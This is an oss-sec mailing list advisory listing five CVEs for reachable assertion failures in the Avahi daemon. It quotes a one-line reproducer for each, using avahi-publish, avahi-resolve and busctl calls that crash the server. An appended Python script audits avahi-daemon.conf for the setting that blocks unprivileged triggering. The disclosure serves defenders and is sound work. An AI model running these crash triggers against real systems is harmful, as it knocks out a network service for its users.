oss-sec mailing list archives
CVEs assigned for reachable assertions in avahi
From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Fri, 6 Oct 2023 14:19:17 -0700
While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVE's being assigned for client requests that can cause
the Avahi server to abort with an assertion failure. Only one of them has a
fix available so far.

----------------------------------------------------------------------------

CVE-2023-38469: https://github.com/lathiat/avahi/issues/455
Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users (unless
 disable-user-service-publishing is set to yes explicitly):

 avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"

----------------------------------------------------------------------------

CVE-2023-38470: https://github.com/lathiat/avahi/issues/454
Reachable assertion in avahi_escape_label

"avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"

Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c

----------------------------------------------------------------------------

CVE-2023-38471: https://github.com/lathiat/avahi/issues/453
Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

 busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"

----------------------------------------------------------------------------

CVE-2023-38472: https://github.com/lathiat/avahi/issues/452
Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

 org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

 using

 avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

 from inside a client creating EntryGroups.

 It can be triggered by unprivileged users unless
 disable-user-service-publishing is set to yes explicitly. By default it's
 set to no."

----------------------------------------------------------------------------

CVE-2023-38473: https://github.com/lathiat/avahi/issues/451
Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

-- 
-Alan Coopersmith- alan.coopersmith () oracle com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
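
Added example, not part of the original post or of the Avahi project: a small audit of avahi-daemon.conf for the disable-user-service-publishing setting that the quoted reports for CVE-2023-38469 and CVE-2023-38472 name as blocking unprivileged triggering. Assumptions: the default path /etc/avahi/avahi-daemon.conf, the key living in the [publish] section as documented in avahi-daemon.conf(5), only a literal "yes" counting as set, and the last assignment winning.

```python
import sys

# CVEs whose quoted reports say the setting blocks unprivileged triggering.
GATED_CVES = ("CVE-2023-38469", "CVE-2023-38472")
DEFAULT_CONF = "/etc/avahi/avahi-daemon.conf"  # assumed default install path
KEY = "disable-user-service-publishing"


def user_publishing_disabled(conf_text):
    """Return True only if [publish] explicitly sets the key to yes."""
    section = None
    value = "no"  # the post states the default is "no"
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment, including a commented-out key
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "publish" or "=" not in line:
            continue  # the key only counts inside [publish]
        key, _, val = line.partition("=")
        if key.strip().lower() == KEY:
            value = val.strip().lower()  # assumption: last assignment wins
    return value == "yes"


def audit(conf_text):
    """Return the CVEs whose stated unprivileged precondition still holds."""
    return () if user_publishing_disabled(conf_text) else GATED_CVES


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_CONF
    with open(path, encoding="utf-8") as fh:
        exposed = audit(fh.read())
    if exposed:
        print(f"{path}: {KEY} is not set to yes; unprivileged "
              f"precondition holds for: {', '.join(exposed)}")
        sys.exit(1)
    print(f"{path}: {KEY}=yes")
```

The setting only covers the two CVEs whose reports mention it; the other three are reached through different calls and are not affected by this check.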